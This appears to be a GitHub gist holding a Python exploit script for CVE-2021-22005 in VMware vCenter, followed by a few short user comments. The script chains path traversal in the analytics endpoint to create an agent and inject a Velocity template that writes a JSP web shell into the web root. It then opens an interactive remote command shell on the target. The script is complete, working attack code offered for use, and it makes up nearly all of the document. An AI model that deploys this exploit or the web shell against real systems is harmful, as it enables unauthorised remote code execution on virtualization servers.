

import requests
import random
import string
import sys
import time
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
def escape(_str):
_str = _str.replace("&", "&")
_str = _str.replace("<", "&lt;")
_str = _str.replace(">", "&gt;")
_str = _str.replace("\"", "&quot;")
return _str
def run_shell(url, pwd, cmd):
burp0_url = url
burp0_headers = {"User-Agent": "Mozilla/5.0", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}
burp0_data = {pwd: cmd.strip()}
ct = requests.post(burp0_url, headers=burp0_headers, data=burp0_data, verify=False).content
ct = ct.split('<pre>')[1].split('</pre>')[0]
return ct
def createAgent(url, agent_name):
burp0_url = url + "/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?_c="+agent_name+"&_i=test2"
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0", "X-Deployment-Secret": "abc", "Content-Type": "application/json", "Connection": "close"}
burp0_json={"manifestSpec":{}, "objectType": "a2", "collectionTriggerDataNeeded": True,"deploymentDataNeeded":True, "resultNeeded": True, "signalCollectionCompleted":True, "localManifestPath": "a7","localPayloadPath": "a8","localObfuscationMapPath": "a9" }
requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False)
pwd = id_generator(6)
agent_name = id_generator(6)
shell_name = id_generator(6)+".jsp"
manifestData = """<manifest recommendedPageSize="500">
<request>
<query name="vir:VCenter">
<constraint>
<targetType>ServiceInstance</targetType>
</constraint>
<propertySpec>
<propertyNames>content.about.instanceUuid</propertyNames>
<propertyNames>content.about.osType</propertyNames>
<propertyNames>content.about.build</propertyNames>
<propertyNames>content.about.version</propertyNames>
</propertySpec>
</query>
</request>
<cdfMapping>
<indepedentResultsMapping>
<resultSetMappings>
<entry>
<key>vir:VCenter</key>
<value>
<value xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="resultSetMapping">
<resourceItemToJsonLdMapping>
<forType>ServiceInstance</forType>
<mappingCode><![CDATA[
$GLOBAL-logger.getLogger().getParent().getAllAppenders().nextElement().setFile("/usr/lib/vmware-sso/vmware-sts/webapps/ROOT/%s")
$GLOBAL-logger.getLogger().getParent().getAllAppenders().nextElement().activateOptions()
$GLOBAL-logger.getLogger().getParent().getAllAppenders().nextElement().setAppend(false)
$GLOBAL-logger.info('<%%@ page import="java.util.*,java.io.*"%%><HTML><BODY><FORM METHOD="GET" NAME="myform" ACTION=""><INPUT TYPE="text" NAME="cmd"><INPUT TYPE="submit" VALUE="Send"></FORM><pre><%%if (request.getParameter("%s") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("%s")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } }%%></pre></BODY></HTML>')
$GLOBAL-logger.getLogger().getParent().getAllAppenders().nextElement().setFile("/var/log/vmware/analytics/analytics.log")
$GLOBAL-logger.getLogger().getParent().getAllAppenders().nextElement().activateOptions()
$GLOBAL-logger.getLogger().getParent().getAllAppenders().nextElement().setAppend(true)
#set($modelKey = $LOCAL-resourceItem.resourceItem.getKey())##
#set($objectId = "vim.ServiceInstance:$modelKey.value:$modelKey.serverGuid")##
#set($obj = $LOCAL-cdf20Result.newObject("vim.ServiceInstance", $objectId))##
$obj.addProperty("OSTYPE", "asdasda")##
$obj.addProperty("BUILD", $content-about-build)##
$obj.addProperty("VERSION", $content-about-version)##]]>
</mappingCode>
</resourceItemToJsonLdMapping>
</value>
</value>
</entry>
</resultSetMappings>
</indepedentResultsMapping>
</cdfMapping>
<requestSchedules>
<schedule interval="1h">
<queries>
<query>vir:VCenter</query>
</queries>
</schedule>
</requestSchedules>
</manifest>""" % (shell_name, pwd, pwd)
target = sys.argv[1]
print "Target: "+ target
print "Creating Agent (of SHIELD) ..."
createAgent(target, agent_name)
print "Collecting Agent (of SHIELD) ..."
burp0_url = target+"/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?action=collect&_c="+agent_name+"&_i=test2"
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0", "X-Deployment-Secret": "abc", "Content-Type": "application/json", "Connection": "close"}
burp0_json={"contextData": "a3", "manifestContent": manifestData, "objectId": "a2"}
requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False, proxies={"https":"http://127.0.0.1:8080"})
print "Success!"
print "Shell: " + target+"/idm/..;/"+shell_name
print "Pwd: "+ pwd
print "Launching pseudo shell ..."
while True:
cmd = raw_input("/remote_shell/# ").strip()
if(cmd =="quit"):
sys.exit(-1)
output = run_shell(target+"/idm/..;/"+shell_name,pwd, cmd)
time.sleep(1)
print(output)
@Grezzo

Grezzo commented Sep 29, 2021

Nice job! What artefacts would be left behind after running this? Just an agent and the webshell? How can the agent be cleared up?

@MAYDA7

MAYDA7 commented Sep 30, 2021

Is this a CVE?

@Grezzo

Grezzo commented Sep 30, 2021

Is this a CVE?

CVE-2021-22005
